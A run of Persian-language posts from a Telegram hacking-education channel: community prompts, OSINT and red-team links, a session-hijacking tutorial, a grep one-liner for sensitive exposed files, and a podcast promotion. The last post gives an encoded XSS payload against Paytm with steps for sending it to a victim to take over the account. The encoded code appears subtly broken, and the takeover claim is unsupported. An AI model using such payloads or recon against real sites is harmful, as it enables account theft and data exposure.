✍ داستان خودتونو تعریف کنید ! 🕊 چگونه بخشی از جامعه TryHackBox شدید یا در آن چه چیزی پیدا کردید؟🥀 شاید محتوای کانال توانسته براتون تغییری ایجاد کنه یا در چیزی کمکتون کرده باشه؟🖤
🕊 داستان جالب آشنایی، یا شاید یک واقعیت جالب درباره کانال یا انتقاد یا به طور کلی موضوع امنیت اطلاعات داری ؟
🖤 در کامنتها بنویسید! هر آنچه احساس میکنید و لازم میدانید را به اشتراک بگذارید درباره ی ما .
🖤🕊🥀🖤🕊🥀🖤🕊🥀🖤🕊🥀
#صحبت
🕊 داستان جالب آشنایی، یا شاید یک واقعیت جالب درباره کانال یا انتقاد یا به طور کلی موضوع امنیت اطلاعات داری ؟
🖤 در کامنتها بنویسید! هر آنچه احساس میکنید و لازم میدانید را به اشتراک بگذارید درباره ی ما .
🖤🕊🥀🖤🕊🥀🖤🕊🥀🖤🕊🥀
#صحبت
❤8🕊5👨💻2😢1
🔥 فایل های حساس روی وب سرور را شناسایی میکند.
@TryHackBox
#باگ_بانتی
cat allurls.txt | grep -E "\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5"
تجربت کامنت کن
@TryHackBox
#باگ_بانتی
❤9🕊3🌚1
Session Fixation and Hijacking(fa).pdf
1.2 MB
آموزش
Session Fixation and Hijacking
به فارسی
اول میریم به سراغ تعریف خود Session و اهمیت session ها
سایت stateful و stateless چه تفاوتی دارد
و بعد از اون Session id ها چی هستن
و در اخر خود حملات رو توضیح میدیم و تفاوت بین شون رو متوجه میشیم
✍️نویسنده
🥀 @TryHackBox | The Chaos
Session Fixation and Hijacking
به فارسی
اول میریم به سراغ تعریف خود Session و اهمیت session ها
سایت stateful و stateless چه تفاوتی دارد
و بعد از اون Session id ها چی هستن
و در اخر خود حملات رو توضیح میدیم و تفاوت بین شون رو متوجه میشیم
✍️نویسنده
🥀 @TryHackBox | The Chaos
🔥5🕊4👍3👌1
فاز اول ردتیم قسمت اول : بدون footprint، همه چیز تارگت رو بدون!
https://x.com/i/status/2021934105630585152
✍ کاوه
@TryHackBox | @KavehOffSec
https://x.com/i/status/2021934105630585152
✍ کاوه
@TryHackBox | @KavehOffSec
X (formerly Twitter)
kaveh (@KavehxNet) on X
فاز اول Red Team قسمت اول: بدون footprint، همه چیز تارگت رو بدون!
این منابع طلایی OSINT برای پیدا کردن IP ranges، ASN، owner و تاریخچه دامنه. 🔥
طلایی برای recon اولیه بدون ردپا! 🔥
#RedTeam #OSINT
این منابع طلایی OSINT برای پیدا کردن IP ranges، ASN، owner و تاریخچه دامنه. 🔥
طلایی برای recon اولیه بدون ردپا! 🔥
#RedTeam #OSINT
❤3👍2
با کمال احترام، مراسم چهلم عزیزان از دست رفته را به دوستان، خانواده و آشنایان آنها تسلیت میگوییم. در این روزهای سخت، ما را در غم خود شریک بدانید. 🕊🖤🥀
دوستان ۲۷ و ۲۸ چهلم عزیزان از دست رفته هست ولی به دلیل فعالیت ، گفتم یادم نشه تسلیت رو عرض کنیم .🖤🕊
با آرزوی صبر و آرامش برای شما
تیم TryHackBox
دوستان ۲۷ و ۲۸ چهلم عزیزان از دست رفته هست ولی به دلیل فعالیت ، گفتم یادم نشه تسلیت رو عرض کنیم .🖤🕊
با آرزوی صبر و آرامش برای شما
تیم TryHackBox
❤28🫡13🕊5👎1
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :
💠 کانال های تلگرام ما :
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
🟣 لینکدین ما :
🔗 https://www.linkedin.com/company/tryhackbox-org
💠 کانال های تلگرام ما :
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
🟣 لینکدین ما :
🔗 https://www.linkedin.com/company/tryhackbox-org
❤2
۷ هک اصلی ترمینال که سرعت کارت را چند برابر میکند 🔥
بیشتر کاربران در کنسول کند کار میکنند، چون قابلیتهای پایه را نمیشناسند. ساعتها وقت صرف جستوجوهای بیهوده و کارهای تکراری میشود، در حالی که همان کار را میتوان با چند دستور ساده انجام داد. اینها ابزارهایی هستند که همین امروز سرعت کارت را بهطور محسوسی افزایش میدهند.
ادامه را در لینکدین بخوانید :
https://lnkd.in/ePMmz6Fq
دوستان ما را در لینکدین دنبال کنید
🥀 @TryHackBox
بیشتر کاربران در کنسول کند کار میکنند، چون قابلیتهای پایه را نمیشناسند. ساعتها وقت صرف جستوجوهای بیهوده و کارهای تکراری میشود، در حالی که همان کار را میتوان با چند دستور ساده انجام داد. اینها ابزارهایی هستند که همین امروز سرعت کارت را بهطور محسوسی افزایش میدهند.
ادامه را در لینکدین بخوانید :
https://lnkd.in/ePMmz6Fq
دوستان ما را در لینکدین دنبال کنید
🥀 @TryHackBox
Linkedin
۷ هک اصلی ترمینال که سرعت کارت را چند برابر میکند 🔥
بیشتر کاربران در کنسول کند کار میکنند، چون قابلیتهای پایه را نمیشناسند.…
بیشتر کاربران در کنسول کند کار میکنند، چون قابلیتهای پایه را نمیشناسند.…
۷ هک اصلی ترمینال که سرعت کارت را چند برابر میکند 🔥
بیشتر کاربران در کنسول کند کار میکنند، چون قابلیتهای پایه را نمیشناسند. ساعتها وقت صرف جستوجوهای بیهوده و کارهای تکراری میشود، در حالی که همان کار را میتوان با چند دستور ساده انجام داد. اینها ابزارهایی…
بیشتر کاربران در کنسول کند کار میکنند، چون قابلیتهای پایه را نمیشناسند. ساعتها وقت صرف جستوجوهای بیهوده و کارهای تکراری میشود، در حالی که همان کار را میتوان با چند دستور ساده انجام داد. اینها ابزارهایی…
❤4🕊1
Try Hack Box
فاز اول ردتیم قسمت اول : بدون footprint، همه چیز تارگت رو بدون! https://x.com/i/status/2021934105630585152 ✍ کاوه @TryHackBox | @KavehOffSec
فاز اول Red Team قسمت دوم : منابع اوسینت و ابزارهای Recon و Relationship و ...
https://x.com/i/status/2022396326059839992
✍ کاوه
@TryHackBox | @KavehOffSec
https://x.com/i/status/2022396326059839992
✍ کاوه
@TryHackBox | @KavehOffSec
X (formerly Twitter)
kaveh (@KavehxNet) on X
فاز اول Red Team قسمت دوم : منابع اوسینت و ابزارهای Recon و Relationship و گوگل دورک ها برای استفاده در اوسینت .
در recon، قدیمیترین ابزارها اغلب مرگبارترین ضربه را میزنند.
#RedTeam #OSINT
در recon، قدیمیترین ابزارها اغلب مرگبارترین ضربه را میزنند.
#RedTeam #OSINT
❤8
۷ هک اصلی ترمینال که سرعت کارت را چند برابر میکند 🔥
بیشتر کاربران در کنسول کند کار میکنند، چون قابلیتهای پایه را نمیشناسند. ساعتها وقت صرف جستوجوهای بیهوده و کارهای تکراری میشود، در حالی که همان کار را میتوان با چند دستور ساده انجام داد. اینها ابزارهایی هستند که همین امروز سرعت کارت را بهطور محسوسی افزایش میدهند.
ادامه را در لینکدین بخوانید :
https://lnkd.in/ePMmz6Fq
دوستان ما را در لینکدین دنبال کنید
🥀 @TryHackBox
بیشتر کاربران در کنسول کند کار میکنند، چون قابلیتهای پایه را نمیشناسند. ساعتها وقت صرف جستوجوهای بیهوده و کارهای تکراری میشود، در حالی که همان کار را میتوان با چند دستور ساده انجام داد. اینها ابزارهایی هستند که همین امروز سرعت کارت را بهطور محسوسی افزایش میدهند.
ادامه را در لینکدین بخوانید :
https://lnkd.in/ePMmz6Fq
دوستان ما را در لینکدین دنبال کنید
🥀 @TryHackBox
Linkedin
۷ هک اصلی ترمینال که سرعت کارت را چند برابر میکند 🔥
بیشتر کاربران در کنسول کند کار میکنند، چون قابلیتهای پایه را نمیشناسند.…
بیشتر کاربران در کنسول کند کار میکنند، چون قابلیتهای پایه را نمیشناسند.…
۷ هک اصلی ترمینال که سرعت کارت را چند برابر میکند 🔥
بیشتر کاربران در کنسول کند کار میکنند، چون قابلیتهای پایه را نمیشناسند. ساعتها وقت صرف جستوجوهای بیهوده و کارهای تکراری میشود، در حالی که همان کار را میتوان با چند دستور ساده انجام داد. اینها ابزارهایی…
بیشتر کاربران در کنسول کند کار میکنند، چون قابلیتهای پایه را نمیشناسند. ساعتها وقت صرف جستوجوهای بیهوده و کارهای تکراری میشود، در حالی که همان کار را میتوان با چند دستور ساده انجام داد. اینها ابزارهایی…
👏6
🎙 قسمت سوم RadioZeroPod | داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی
🕊 داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی ...
🥀 این پادکست درباره نفوذ فیزیکی به یکی از بانکهای لبنان است. یک پروژه قانونی با پایانی غیرمنتظره که توسط یکی از مشهورترین متخصصان تست نفوذ فیزیکی، جیسون ای. استریت (https://jaysonestreet.com/) انجام شده است!
🕊 • کل داستان مجموعهای از واقعیتها است که با نظرات شخصی او از سخنرانیها، مصاحبهها و گفتوگوهای پشت صحنه ترکیب شده است. اگر علاقهمندید بدانید چگونه امنیت فیزیکی یک بانک با استفاده از مهندسی اجتماعی آزمایش شده پادکست را گوش بدید و نظراتتون رو بگید .
💠 https://youtu.be/g_Q3jy5yamc
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @TryCodeBox
🆔 @RadioZeroPod
🕊 داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی ...
🥀 این پادکست درباره نفوذ فیزیکی به یکی از بانکهای لبنان است. یک پروژه قانونی با پایانی غیرمنتظره که توسط یکی از مشهورترین متخصصان تست نفوذ فیزیکی، جیسون ای. استریت (https://jaysonestreet.com/) انجام شده است!
🕊 • کل داستان مجموعهای از واقعیتها است که با نظرات شخصی او از سخنرانیها، مصاحبهها و گفتوگوهای پشت صحنه ترکیب شده است. اگر علاقهمندید بدانید چگونه امنیت فیزیکی یک بانک با استفاده از مهندسی اجتماعی آزمایش شده پادکست را گوش بدید و نظراتتون رو بگید .
💠 https://youtu.be/g_Q3jy5yamc
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @TryCodeBox
🆔 @RadioZeroPod
❤2👍2
🕊 دراپ کردن یه پچ XSS اخیر در Paytm!
👀 مراحل :
1. پیلود رو در search box وارد کن.
2. URL رو کپی کن.
3. به victim بفرست.
4. takeover حساب با یک کلیک!!
✅پیلود :
🥀 @TryHackBox
#باگ_بانتی #xss
👀 مراحل :
1. پیلود رو در search box وارد کن.
2. URL رو کپی کن.
3. به victim بفرست.
4. takeover حساب با یک کلیک!!
✅پیلود :
<noscript onload=(new Function('\u0073\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0039\u0037\u002c\u0031\u0030\u0038\u002c\u0031\u0030\u0031\u002c\u0031\u0030\u0039\u002c\u0031\u0031\u0036\u002c\u0034\u0030\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0031\u0029'))()>
🥀 @TryHackBox
#باگ_بانتی #xss
❤2